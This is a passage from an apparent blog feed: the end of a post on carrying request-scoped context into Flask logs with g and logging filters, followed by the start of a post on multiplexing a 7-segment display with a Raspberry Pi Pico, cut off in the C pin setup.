<span class="hljs-ignore">    def get(self):</span>
        self.logger.info(<span class="hljs-string">'hello from view'</span>)
<span class="hljs-ignore">        return 'Hello World\n'</span>
</code></pre>
<p>So far so good, calling the app works as expected:</p>
<pre class="console"><code>$ curl localhost:8080
Hello World
</code></pre>
<p>And our message also appears in the logs:</p>
<pre><code class="hljs json">{<span class="hljs-attr">"name"</span>: <span class="hljs-string">"view.hello"</span>, <span class="hljs-attr">"message"</span>: <span class="hljs-string">"hello from view"</span>}
</code></pre>
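<p>The post doesn't show how these JSON log lines are produced. A minimal sketch, assuming the standard <code>logging</code> module and a hand-written formatter (the <code>JsonFormatter</code> and <code>STANDARD_ATTRS</code> names are made up for this example). Attributes passed in via <code>extra=...</code> end up on the <code>LogRecord</code>, so the formatter can pick those up as well.</p>

```python
import json
import logging

# Attributes every LogRecord has by default; anything else was passed in via extra=...
STANDARD_ATTRS = set(vars(logging.LogRecord("", 0, "", 0, "", None, None))) | {"message"}


class JsonFormatter(logging.Formatter):
    def format(self, record):
        entry = {"name": record.name, "message": record.getMessage()}
        for key, value in vars(record).items():
            if key not in STANDARD_ATTRS:
                entry[key] = str(value)  # str() so values like uuid.UUID stay serializable
        return json.dumps(entry)


# Usage: attach it to a handler
handler = logging.StreamHandler()
handler.setFormatter(JsonFormatter())
logging.getLogger("view").addHandler(handler)
```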
<p>But as time goes on and requirements change, we need to be able to add extra data to the logs. Such data could be, say, a unique identifier generated for each request.</p>
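<pre><code class="hljs python"><span class="hljs-keyword">import</span> time
<span class="hljs-keyword">import</span> uuid
<span class="hljs-keyword">from</span> functools <span class="hljs-keyword">import</span> wraps

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">ContextLogger</span>:</span>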
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span><span class="hljs-params">(self, logger)</span>:</span>
        self.__logger = logger
        self.__context = {}

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">add_context</span><span class="hljs-params">(self, key, value)</span>:</span>
        self.__context[key] = value

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">info</span><span class="hljs-params">(self, message)</span>:</span>
        self.__logger.info(message, extra=self.__context)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">add_request_id</span><span class="hljs-params">(logger)</span>:</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">decorator</span><span class="hljs-params">(f)</span>:</span>
<span class="hljs-meta">        @wraps(f)</span>
        <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">decorated_function</span><span class="hljs-params">(self)</span>:</span>
            request_id = uuid.uuid4()
            logger.add_context(<span class="hljs-string">'request_id'</span>, request_id)
            logger.info(<span class="hljs-string">f'hello from middleware (<span class="hljs-subst">{request_id}</span>)'</span>)
            <span class="hljs-keyword">return</span> f(self, request_id)
        <span class="hljs-keyword">return</span> decorated_function
    <span class="hljs-keyword">return</span> decorator

<span class="hljs-ignore">class HelloView(MethodView):</span>
    logger = ContextLogger(logging.getLogger(<span class="hljs-string">'view.hello'</span>))

<span class="hljs-meta">    @add_request_id(logger)</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">get</span><span class="hljs-params">(self, request_id)</span>:</span>
        time.sleep(<span class="hljs-number">0.01</span>)
<span class="hljs-ignore">        self.logger.info(f'hello from view ({request_id})')</span>
<span class="hljs-ignore">        return 'Hello World\n'</span>
</code></pre>
<p>In reality, <code>ContextLogger</code> would be a bit more complex: it would also implement the other logging methods (<code>warning</code>, <code>error</code>, etc.) and merge in any <code>extra</code> argument passed by the caller.</p>
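<p>A sketch of what such a fuller <code>ContextLogger</code> might look like. The set of methods and the merge order (caller-supplied <code>extra</code> keys override the stored context) are assumptions, and <code>ListHandler</code> is a hypothetical helper that just collects records for inspection:</p>
<pre><code class="hljs python">import logging


class ContextLogger:
    """Wraps a logging.Logger and attaches a context dict to every record."""

    def __init__(self, logger):
        self.__logger = logger
        self.__context = {}

    def add_context(self, key, value):
        self.__context[key] = value

    def log(self, level, message, *args, extra=None, **kwargs):
        # Caller-supplied `extra` keys override the stored context
        # (an arbitrary choice; the opposite order would work too).
        merged = {**self.__context, **(extra or {})}
        self.__logger.log(level, message, *args, extra=merged, **kwargs)

    def debug(self, message, *args, **kwargs):
        self.log(logging.DEBUG, message, *args, **kwargs)

    def info(self, message, *args, **kwargs):
        self.log(logging.INFO, message, *args, **kwargs)

    def warning(self, message, *args, **kwargs):
        self.log(logging.WARNING, message, *args, **kwargs)

    def error(self, message, *args, **kwargs):
        self.log(logging.ERROR, message, *args, **kwargs)


class ListHandler(logging.Handler):
    """Keeps records in memory so they can be inspected."""

    def __init__(self):
        super().__init__()
        self.records = []

    def emit(self, record):
        self.records.append(record)


handler = ListHandler()
base = logging.getLogger('view.hello')
base.setLevel(logging.DEBUG)
base.propagate = False
base.addHandler(handler)

logger = ContextLogger(base)
logger.add_context('request_id', 'abc-123')
logger.warning('slow backend: %d ms', 250, extra={'backend': 'users'})

record = handler.records[0]
print(record.getMessage(), record.request_id, record.backend)
# slow backend: 250 ms abc-123 users
</code></pre>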
<p>The <code>sleep</code> call simulates other work done by the view, such as calling a backend service to collect the data needed to display <code>Hello World</code>. Anyway, the application still works fine.</p>
<pre><code class="hljs json">{
  <span class="hljs-attr">"name"</span>: <span class="hljs-string">"view.hello"</span>,
  <span class="hljs-attr">"message"</span>: <span class="hljs-string">"hello from middleware (5f428aa7-cf68-4ae4-a003-2b95085f7f7d)"</span>,
  <span class="hljs-attr">"request_id"</span>: <span class="hljs-string">"5f428aa7-cf68-4ae4-a003-2b95085f7f7d"</span>
}
{
  <span class="hljs-attr">"name"</span>: <span class="hljs-string">"view.hello"</span>,
  <span class="hljs-attr">"message"</span>: <span class="hljs-string">"hello from view (5f428aa7-cf68-4ae4-a003-2b95085f7f7d)"</span>,
  <span class="hljs-attr">"request_id"</span>: <span class="hljs-string">"5f428aa7-cf68-4ae4-a003-2b95085f7f7d"</span>
}
</code></pre>
<p>Or does it? What happens if we try to send multiple requests at the same time?</p>
<pre class="console"><code>$ curl localhost:8080 &amp; curl localhost:8080 &amp;
</code></pre>
<pre><code class="hljs json">{
  <span class="hljs-attr">"name"</span>: <span class="hljs-string">"view.hello"</span>,
  <span class="hljs-attr">"message"</span>: <span class="hljs-string">"hello from middleware (36d1627c-2159-4865-92ed-c63969efde47)"</span>,
  <span class="hljs-attr">"request_id"</span>: <span class="hljs-string">"36d1627c-2159-4865-92ed-c63969efde47"</span>
}
{
  <span class="hljs-attr">"name"</span>: <span class="hljs-string">"view.hello"</span>,
  <span class="hljs-attr">"message"</span>: <span class="hljs-string">"hello from middleware (78062d9e-bb3a-4a74-a24c-e0ba22be6660)"</span>,
  <span class="hljs-attr">"request_id"</span>: <span class="hljs-string">"78062d9e-bb3a-4a74-a24c-e0ba22be6660"</span>
}
{
  <span class="hljs-attr">"name"</span>: <span class="hljs-string">"view.hello"</span>,
  <span class="hljs-attr">"message"</span>: <span class="hljs-string">"hello from view (36d1627c-2159-4865-92ed-c63969efde47)"</span>,
  <span class="hljs-attr">"request_id"</span>: <span class="hljs-string">"78062d9e-bb3a-4a74-a24c-e0ba22be6660"</span>
}
{
  <span class="hljs-attr">"name"</span>: <span class="hljs-string">"view.hello"</span>,
  <span class="hljs-attr">"message"</span>: <span class="hljs-string">"hello from view (78062d9e-bb3a-4a74-a24c-e0ba22be6660)"</span>,
  <span class="hljs-attr">"request_id"</span>: <span class="hljs-string">"78062d9e-bb3a-4a74-a24c-e0ba22be6660"</span>
}
</code></pre>
<p>The middleware logs look fine, but the view logs have the same <code>request_id</code> for both requests. Yet the <code>message</code> has the right value. What the f... udge.</p>
<h3>The quick fix</h3>
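<p>The error is caused by the fact that the <code>logger</code> in the <code>HelloView</code> class is a class attribute (effectively static), so it is initialized only once, when the module containing the class is loaded at application startup, and every request shares that one instance along with its context <code>dict</code>. The <code>message</code> is still correct because it is built from the local <code>request_id</code> variable, while the <code>request_id</code> field comes from the shared context, which the second request has already overwritten. We expected to have a separate logger instance per request. Or rather, we didn't even think about it. Logging worked before, it worked after, so there should be no problem here.</p>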
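<p>The interleaving can be reproduced without Flask or threads. The sketch below replays, in a fixed order, what the two concurrent requests did (both middlewares ran before either view finished its <code>sleep</code>). It uses a minimal copy of <code>ContextLogger</code> and a hypothetical <code>ListHandler</code> that collects records:</p>
<pre><code class="hljs python">import logging


class ContextLogger:
    """Minimal copy of the post's ContextLogger."""

    def __init__(self, logger):
        self.__logger = logger
        self.__context = {}

    def add_context(self, key, value):
        self.__context[key] = value

    def info(self, message):
        self.__logger.info(message, extra=self.__context)


class ListHandler(logging.Handler):
    """Collects records in memory so they can be inspected."""

    def __init__(self):
        super().__init__()
        self.records = []

    def emit(self, record):
        self.records.append(record)


handler = ListHandler()
base = logging.getLogger('view.hello')
base.setLevel(logging.INFO)
base.propagate = False
base.addHandler(handler)

# One instance shared by every request, like the HelloView class attribute.
shared = ContextLogger(base)

# Replay the interleaving from the output above: both middlewares run
# before either view gets past its sleep().
for request_id in ('A', 'B'):
    shared.add_context('request_id', request_id)
    shared.info(f'hello from middleware ({request_id})')
for request_id in ('A', 'B'):
    shared.info(f'hello from view ({request_id})')

for record in handler.records:
    print(record.getMessage(), record.request_id)
</code></pre>
<p>The third record, <code>hello from view (A)</code>, carries <code>request_id</code> <code>B</code>, just like in the real output.</p>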
<p>A possible fix might be to initialize the <code>logger</code> in the constructor, but then we can't simply pass it to the middleware (which might be necessary so that the view and the middleware running before it log under the same logger name).</p>
<pre><code class="hljs python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">add_request_id</span><span class="hljs-params">()</span>:</span>
<span class="hljs-ignore">    def decorator(f):</span>
<span class="hljs-ignore">        @wraps(f)</span>
<span class="hljs-ignore">        def decorated_function(self):</span>
<span class="hljs-ignore">            request_id = uuid.uuid4()</span>
            self.logger.add_context(<span class="hljs-string">'request_id'</span>, request_id)
            self.logger.info(<span class="hljs-string">f'hello from middleware (<span class="hljs-subst">{request_id}</span>)'</span>)
<span class="hljs-ignore">            return f(self, request_id)</span>
<span class="hljs-ignore">        return decorated_function</span>
<span class="hljs-ignore">    return decorator</span>

<span class="hljs-ignore">class HelloView(MethodView):</span>
    logger = <span class="hljs-literal">None</span>

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span><span class="hljs-params">(self)</span>:</span>
        self.logger = ContextLogger(logging.getLogger(<span class="hljs-string">'view.hello'</span>))

<span class="hljs-meta">    @add_request_id()</span>
<span class="hljs-ignore">    def get(self, request_id):</span>
<span class="hljs-ignore">        time.sleep(0.01)</span>
<span class="hljs-ignore">        self.logger.info(f'hello from view ({request_id})')</span>
<span class="hljs-ignore">        return 'Hello World\n'</span>
</code></pre>
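<p>The decorator can access all the parameters of the function it decorates, including <code>self</code>, through which it can still reach the <code>logger</code>. Because Flask creates a new view instance for every request by default, each request now gets its own <code>ContextLogger</code>. Not very elegant, but it works. That's what quick fixes are all about, right?</p>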
<h3>A more permanent solution</h3>
<p>Flask has something called the <a href="https://flask.palletsprojects.com/en/2.2.x/reqcontext/">Request Context</a>: the <code>request</code> variable always refers to the request currently being processed, so if we could attach our own data to it, that would solve the problem. We can achieve this by overriding a couple of Flask classes.</p>
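<pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Request, request

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">MyRequest</span><span class="hljs-params">(Request)</span>:</span>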
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span><span class="hljs-params">(self, environ, populate_request=True, shallow=False)</span>:</span>
        super().__init__(environ, populate_request, shallow)
        self.__context = {}

<span class="hljs-meta">    @property</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">context</span><span class="hljs-params">(self)</span>:</span>
        <span class="hljs-keyword">return</span> self.__context

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">add_context</span><span class="hljs-params">(self, key, value)</span>:</span>
        self.__context[key] = value

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">MyFlask</span><span class="hljs-params">(Flask)</span>:</span>
    request_class = MyRequest

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">RequestContextLogger</span>:</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span><span class="hljs-params">(self, logger)</span>:</span>
        self.__logger = logger

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">info</span><span class="hljs-params">(self, message)</span>:</span>
        self.__logger.info(message, extra=request.context)

<span class="hljs-ignore">def add_request_id(logger):</span>
<span class="hljs-ignore">    def decorator(f):</span>
<span class="hljs-ignore">        @wraps(f)</span>
<span class="hljs-ignore">        def decorated_function(self):</span>
<span class="hljs-ignore">            request_id = uuid.uuid4()</span>
            request.add_context(<span class="hljs-string">'request_id'</span>, request_id)

<span class="hljs-ignore">            logger.info(f'hello from middleware ({request_id})')</span>
<span class="hljs-ignore">            return f(self, request_id)</span>
<span class="hljs-ignore">        return decorated_function</span>
<span class="hljs-ignore">    return decorator</span>

<span class="hljs-ignore">class HelloView(MethodView):</span>
    logger = RequestContextLogger(logging.getLogger(<span class="hljs-string">'view.hello'</span>))

<span class="hljs-ignore">    @add_request_id(logger)</span>
<span class="hljs-ignore">    def get(self, request_id):</span>
<span class="hljs-ignore">        time.sleep(0.01)</span>
<span class="hljs-ignore">        self.logger.info(f'hello from view ({request_id})')</span>
<span class="hljs-ignore">        return 'Hello World\n'</span>

app = MyFlask(__name__)
<span class="hljs-ignore">app.add_url_rule('/', view_func=HelloView.as_view('hello'))</span>

<span class="hljs-ignore">if __name__ == '__main__':</span>
<span class="hljs-ignore">    app.run(port=8080)</span>
</code></pre>
<p>While putting this solution together, I managed to shoot myself in the foot once again, just as I did with the <code>logger</code>. In the first version, <code>__context</code> was a class attribute instead of being set in <code>__init__</code>, so every request shared the same <code>dict</code>, which made it look as if the whole approach didn't work. I didn't learn from my mistakes fast enough.</p>
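<p>This pitfall is easy to reproduce in plain Python: a mutable value such as a <code>dict</code> assigned in the class body is created once and shared by all instances, while one assigned in <code>__init__</code> belongs to a single instance. The class names below are hypothetical stand-ins for <code>MyRequest</code>:</p>
<pre><code class="hljs python">class SharedContextRequest:
    # Evaluated once, when the class body runs: every instance
    # ends up pointing at this same dict.
    context = {}

    def add_context(self, key, value):
        self.context[key] = value


class PerRequestContextRequest:
    def __init__(self):
        # Evaluated on every instantiation: each request gets a fresh dict.
        self.context = {}

    def add_context(self, key, value):
        self.context[key] = value


first, second = SharedContextRequest(), SharedContextRequest()
first.add_context('request_id', 'A')
second.add_context('request_id', 'B')
print(first.context)  # {'request_id': 'B'}: the second request leaked in

first, second = PerRequestContextRequest(), PerRequestContextRequest()
first.add_context('request_id', 'A')
second.add_context('request_id', 'B')
print(first.context)  # {'request_id': 'A'}
</code></pre>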
<p>After a bit of digging, you may find that we're not the only ones who thought that adding extra data to <code>request</code> might be a desirable thing to do. We can replace our homebrew solution with Flask's <a href="https://flask.palletsprojects.com/en/2.2.x/appcontext/#storing-data"><code>g</code> variable</a>, which will help to get rid of a good chunk of code.</p>
<pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> g

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">GContextLogger</span>:</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span><span class="hljs-params">(self, logger)</span>:</span>
        self.__logger = logger

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">info</span><span class="hljs-params">(self, message)</span>:</span>
        self.__logger.info(message, extra=g.log_context)

<span class="hljs-ignore">def add_request_id(logger):</span>
<span class="hljs-ignore">    def decorator(f):</span>
<span class="hljs-ignore">        @wraps(f)</span>
<span class="hljs-ignore">        def decorated_function(self):</span>
<span class="hljs-ignore">            request_id = uuid.uuid4()</span>
            g.log_context = {<span class="hljs-string">'request_id'</span>: request_id}

<span class="hljs-ignore">            logger.info(f'hello from middleware ({request_id})')</span>
<span class="hljs-ignore">            return f(self, request_id)</span>
<span class="hljs-ignore">        return decorated_function</span>
<span class="hljs-ignore">    return decorator</span>

<span class="hljs-ignore">class HelloView(MethodView):</span>
    logger = GContextLogger(logging.getLogger(<span class="hljs-string">'view.hello'</span>))

<span class="hljs-ignore">    @add_request_id(logger)</span>
<span class="hljs-ignore">    def get(self, request_id):</span>
<span class="hljs-ignore">        time.sleep(0.01)</span>
<span class="hljs-ignore">        self.logger.info(f'hello from view ({request_id})')</span>
<span class="hljs-ignore">        return 'Hello World\n'</span>
</code></pre>
<p>A bit better, but there's still room for improvement. What happens, for example, if the view raises an exception that is handled by a Flask error handler, which also happens to create a log? Will the extra data be on it? And what about the logs of an external module we use?</p>
<h3>The &quot;final&quot; solution</h3>
<p>As far as anything can be final. Perhaps &quot;a solution that meets the current requirements to the best of our knowledge&quot; would be a better term. First of all, let's get rid of the <code>GContextLogger</code> class so that we don't have to wrap every logger instance in something. To do this, we can use <a href="https://docs.python.org/3/howto/logging-cookbook.html#using-filters-to-impart-contextual-information">Python's logging filters</a>, which are designed for filtering log records but are also often used to add contextual information to them.</p>
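<pre><code class="hljs python"><span class="hljs-keyword">from</span> logging <span class="hljs-keyword">import</span> Filter
<span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> g, has_request_context

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">LogContextFilter</span><span class="hljs-params">(Filter)</span>:</span>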
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">filter</span><span class="hljs-params">(self, record)</span>:</span>
        <span class="hljs-keyword">if</span> has_request_context() <span class="hljs-keyword">and</span> hasattr(g, <span class="hljs-string">'log_context'</span>):
            <span class="hljs-keyword">for</span> k, v <span class="hljs-keyword">in</span> g.log_context.items():
                setattr(record, k, v)

        <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span>
</code></pre>
<p>Here we are a bit more careful about accessing <code>g.log_context</code>. We should only try to get data from it if we are processing a Flask request and it already has a <code>log_context</code>.</p>
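<p>The filter also has to be registered somewhere, and where it goes matters for the external-module question above. A filter added to a logger is only consulted for records logged through that exact logger, not for records propagated up from its children, while a filter added to a handler sees every record the handler processes. Here is a stdlib-only sketch, with a plain dict standing in for <code>g.log_context</code> (the <code>CONTEXT</code> dict, the logger names and <code>ListHandler</code> are hypothetical):</p>
<pre><code class="hljs python">import logging

# Stand-in for Flask's g.log_context (hypothetical; no Flask here).
CONTEXT = {'request_id': 'abc-123'}


class LogContextFilter(logging.Filter):
    """Copies the context dict onto each record, like the post's filter."""

    def filter(self, record):
        for k, v in CONTEXT.items():
            setattr(record, k, v)
        return True


class ListHandler(logging.Handler):
    """Collects records in memory so they can be inspected."""

    def __init__(self):
        super().__init__()
        self.records = []

    def emit(self, record):
        self.records.append(record)


handler = ListHandler()
app_logger = logging.getLogger('myapp')  # plays the role of app.logger
app_logger.setLevel(logging.INFO)
app_logger.propagate = False
app_logger.addHandler(handler)
# A child logger, standing in for any logger whose records propagate
# up to this handler without going through app_logger itself.
external = logging.getLogger('myapp.external')


def log_both():
    handler.records.clear()
    app_logger.info('from the app')
    external.info('from an external module')
    return [getattr(r, 'request_id', None) for r in handler.records]


# 1) Filter on the logger: the propagated child record skips it.
logger_filter = LogContextFilter()
app_logger.addFilter(logger_filter)
logger_filter_result = log_both()
print(logger_filter_result)  # ['abc-123', None]

# 2) Filter on the handler: every record the handler emits gets the context.
app_logger.removeFilter(logger_filter)
handler.addFilter(LogContextFilter())
handler_filter_result = log_both()
print(handler_filter_result)  # ['abc-123', 'abc-123']
</code></pre>
<p>In a Flask app this would mean adding the filter to whichever handler actually writes the logs (for example <code>flask.logging.default_handler</code>, if that's the one in use) rather than only to <code>app.logger</code>.</p>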
<p>You can also get rid of the <code>logger</code> creation and use the <a href="https://flask.palletsprojects.com/en/2.2.x/logging/">Flask-configured <code>app.logger</code></a> instead. The only drawback is that you have to manually add the view name to the logs (if you really need it) because the <code>name</code> field will have the same value as the <code>app.name</code> variable.</p>
<pre><code class="hljs python"><span class="hljs-ignore">def add_request_id():</span>
<span class="hljs-ignore">    def decorator(f):</span>
<span class="hljs-ignore">        @wraps(f)</span>
<span class="hljs-ignore">        def decorated_function(self):</span>
<span class="hljs-ignore">            request_id = uuid.uuid4()</span>
            g.log_context = {
                <span class="hljs-string">'request_id'</span>: request_id,
                <span class="hljs-string">'view'</span>: self.__class__.__name__,
            }

            app.logger.info(<span class="hljs-string">f'hello from middleware (<span class="hljs-subst">{request_id}</span>)'</span>)
<span class="hljs-ignore">            return f(self, request_id)</span>
<span class="hljs-ignore">        return decorated_function</span>
<span class="hljs-ignore">    return decorator</span>

<span class="hljs-ignore">class HelloView(MethodView):</span>
<span class="hljs-ignore">    @add_request_id()</span>
<span class="hljs-ignore">    def get(self, request_id):</span>
<span class="hljs-ignore">        time.sleep(0.01)</span>
        app.logger.info(<span class="hljs-string">f'hello from view (<span class="hljs-subst">{request_id}</span>)'</span>)
<span class="hljs-ignore">        return 'Hello World\n'</span>
</code></pre>
<pre><code class="hljs json">{
  <span class="hljs-attr">"name"</span>: <span class="hljs-string">"test"</span>,
  <span class="hljs-attr">"message"</span>: <span class="hljs-string">"hello from middleware (7575ef53-8764-4d17-967b-af2902691ac4)"</span>,
  <span class="hljs-attr">"request_id"</span>: <span class="hljs-string">"7575ef53-8764-4d17-967b-af2902691ac4"</span>,
  <span class="hljs-attr">"view"</span>: <span class="hljs-string">"HelloView"</span>
}
{
  <span class="hljs-attr">"name"</span>: <span class="hljs-string">"test"</span>,
  <span class="hljs-attr">"message"</span>: <span class="hljs-string">"hello from view (7575ef53-8764-4d17-967b-af2902691ac4)"</span>,
  <span class="hljs-attr">"request_id"</span>: <span class="hljs-string">"7575ef53-8764-4d17-967b-af2902691ac4"</span>,
  <span class="hljs-attr">"view"</span>: <span class="hljs-string">"HelloView"</span>
}
</code></pre>
<p>Since we probably want to do this for every request, we can also replace the <code>add_request_id</code> middleware with a global solution.</p>
<pre><code class="hljs python"><span class="hljs-ignore">class HelloView(MethodView):</span>
<span class="hljs-ignore">    def get(self):</span>
        g.log_context[<span class="hljs-string">'view'</span>] = self.__class__.__name__

<span class="hljs-ignore">        app.logger.info(f'hello from view')</span>
<span class="hljs-ignore">        return 'Hello World\n'</span>

<span class="hljs-ignore">app = Flask(__name__)</span>
<span class="hljs-ignore">app.add_url_rule('/', view_func=HelloView.as_view('hello'))</span>

<span class="hljs-meta">@app.before_request</span>
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">init_logging_context</span><span class="hljs-params">()</span>:</span>
    g.log_context = {
        <span class="hljs-string">'request_id'</span>: uuid.uuid4(),
        <span class="hljs-string">'ip'</span>: request.remote_addr,
    }
</code></pre>
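<p>One drawback of this solution is that <code>before_request</code> runs before the view, so it has no <code>self</code> to take the class name from; instead, the view has to add its own name to the <code>log_context</code>. (The URL has already been matched at this point, though, so <code>request.endpoint</code> is available in <code>before_request</code> if the endpoint name is enough.)</p>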
<p>This brings us to our current final solution. You can see the individual phases in their entirety in the <a href="https://github.com/deadlime/flask-logging-experiments">related GitHub repository</a>. Have a nice log.</p>

]]></content:encoded>
        </item>
            <item>
            <title>The smallest Pi</title>
            <link>https://deadlime.hu/en/2022/10/21/the-smallest-pi/</link>
            <pubDate>Fri, 21 Oct 2022 12:59:00 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[Raspberry Pi]]></category>
                    <category><![CDATA[hardware]]></category>
                    
            <guid isPermaLink="false">bdb82983ddddf670b3eccc41ef751b23</guid>
            <description>Using a 7-segment display with Raspberry Pi Pico</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2022/pico.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>Almost two years have passed since the release of the Raspberry Pi Pico, and the newer Wi-Fi capable model W has come out since then as well. Naturally, I ordered both of them, but it took a long time to actually get around to doing something with them. But the day finally came.</p>
<p>I'll drive a 4-character 7-segment display with it using the Pico's PIO (programmable I/O). These are small state machines inside the Pico that run programs written in a simple assembly language.</p>
<h3>Preparations</h3>
<p>The <a href="https://www.raspberrypi.com/documentation/microcontrollers/raspberry-pi-pico.html#raspberry-pi-pico">official documentation</a> is quite comprehensive about setting up a development environment so I won't go into details here.</p>
<p>The default process is not that developer friendly: you build the program, unplug the USB cable from the Pico, hold down the BOOTSEL button on the Pico, plug the USB cable back in, drag and drop the UF2 file onto the storage device that shows up, and you're done. What can I say, it kills the mood a bit. Luckily, there are alternative solutions.</p>
<p>In the end I went with Picoprobe + CLion; this way I can debug the new code on the Pico with the press of a button in the IDE. I first started setting this up on Windows, but I gave up on the &quot;build OpenOCD with MSYS2&quot; part and switched to Linux. Maybe I'll give it another try with WSL2 if I ever need a challenge. Besides the official documentation, <a href="https://twitter.com/savage_drummer/status/1376495816353796099">this tweet</a> helped a lot with setting everything up.</p>
<h3>The display</h3>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2022/7segment.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>
<p class="image-caption">The <a href="https://www.hestore.hu/prod_10042385.html">SH5463AW-14</a></p>

<p>We need to turn 33 segments on and off (the central <code>:</code> counts as a single segment): the ones that make up the characters, plus the extra dots. And we only have 14 pins to do this. Something strange is going on here. The trick is that only one character can be lit at a time. The good news is that if we switch between the characters quickly enough, our lame human eyes will think that all four are lit.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2022/7segment_diagram.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>To turn on a specific segment, we have to set its pin in the bottom row to 1 and the corresponding COM pin in the top row to 0. If we want to display the same character in multiple places, we can set multiple COM pins to 0, but in practice it might not be worth the hassle.</p>
<p>Let's look at a (not so) short example. Let's say we want to display <code>12:34</code> (pins not mentioned in a step are switched off, meaning segment pins at 0 and COM pins at 1):</p>
<ol>
<li>set pins <code>9</code> and <code>4</code> to 1 and pin <code>14</code> to 0</li>
<li>wait a bit</li>
<li>set pins <code>13</code>, <code>9</code>, <code>2</code>, <code>1</code>, <code>5</code> to 1 and pin <code>11</code> to 0</li>
<li>wait a bit</li>
<li>set pin <code>8</code> to 1 and pin <code>7</code> to 0</li>
<li>wait a bit</li>
<li>set pins <code>13</code>, <code>9</code>, <code>4</code>, <code>2</code>, <code>5</code> to 1 and pin <code>10</code> to 0</li>
<li>wait a bit</li>
<li>set pins <code>9</code>, <code>4</code>, <code>12</code>, <code>5</code> to 1 and pin <code>6</code> to 0</li>
<li>wait a bit</li>
<li>jump back to step one</li>
</ol>
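<p>The steps above follow mechanically from two tables: which segments make up each digit, and which display pin drives each segment and COM line. A small Python sketch (the table names and the <code>steps_for</code> helper are hypothetical; the pin numbers are the display pins used in this post, and the digit patterns are the usual 7-segment ones) regenerates the list for <code>12:34</code>:</p>
<pre><code class="hljs python"># Display pin driving each segment (the A..DP constants in the C code).
SEGMENT_PIN = {'A': 13, 'B': 9, 'C': 4, 'D': 2, 'E': 1, 'F': 12, 'G': 5, 'DP': 3}

# Display pin of the COM line for each character place (COM_1..COM_4).
COM_PIN = [14, 11, 10, 6]

# The colon: segment pin D5 and its own COM line, COM_DOTS.
COLON_SEGMENT_PIN = 8
COLON_COM_PIN = 7

# Segments lit for each digit on a standard 7-segment display.
DIGIT_SEGMENTS = {
    '0': 'ABCDEF', '1': 'BC', '2': 'ABDEG', '3': 'ABCDG', '4': 'BCFG',
    '5': 'ACDFG', '6': 'ACDEFG', '7': 'ABC', '8': 'ABCDEFG', '9': 'ABCDFG',
}


def steps_for(text):
    """Return (pins set to 1, COM pin set to 0) for each multiplexing step."""
    steps = []
    place = 0
    for char in text:
        if char == ':':
            steps.append(([COLON_SEGMENT_PIN], COLON_COM_PIN))
        else:
            high = [SEGMENT_PIN[segment] for segment in DIGIT_SEGMENTS[char]]
            steps.append((high, COM_PIN[place]))
            place += 1
    return steps


for high, com in steps_for('12:34'):
    print(f'set pins {high} to 1 and pin {com} to 0')
</code></pre>
<p>Each printed line corresponds to one of the set steps in the list, in the same order.</p>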
<p>If we didn't jump back to the beginning and repeat this until the end of time, the numbers would light up on the display only for a brief moment.</p>
<h3>First try</h3>
<p>First I wanted to translate the process above into C code. That way I can test that I understood the display datasheet and the Pico SDK documentation correctly, and that I wired everything up properly. At this stage, using PIO would be an unnecessary complication. The whole code is on <a href="https://github.com/deadlime/pico-7-segment-display/tree/main/1_c-only">GitHub</a>.</p>
<p>Let's start with some configuration:</p>
<pre class="file"><code>c_only.c
</code></pre>
<pre><code class="hljs arduino"><span class="hljs-keyword">const</span> uint pin_map_display_to_pico[] = {
  <span class="hljs-number">0</span>,
  <span class="hljs-number">16</span>, <span class="hljs-number">17</span>, <span class="hljs-number">18</span>, <span class="hljs-number">19</span>, <span class="hljs-number">20</span>, <span class="hljs-number">21</span>, <span class="hljs-number">22</span>,
  <span class="hljs-number">9</span>, <span class="hljs-number">10</span>, <span class="hljs-number">11</span>, <span class="hljs-number">12</span>, <span class="hljs-number">13</span>, <span class="hljs-number">14</span>, <span class="hljs-number">15</span>,
};

<span class="hljs-keyword">const</span> uint A  = pin_map_display_to_pico[<span class="hljs-number">13</span>];
<span class="hljs-keyword">const</span> uint B  = pin_map_display_to_pico[<span class="hljs-number">9</span>];
<span class="hljs-keyword">const</span> uint C  = pin_map_display_to_pico[<span class="hljs-number">4</span>];
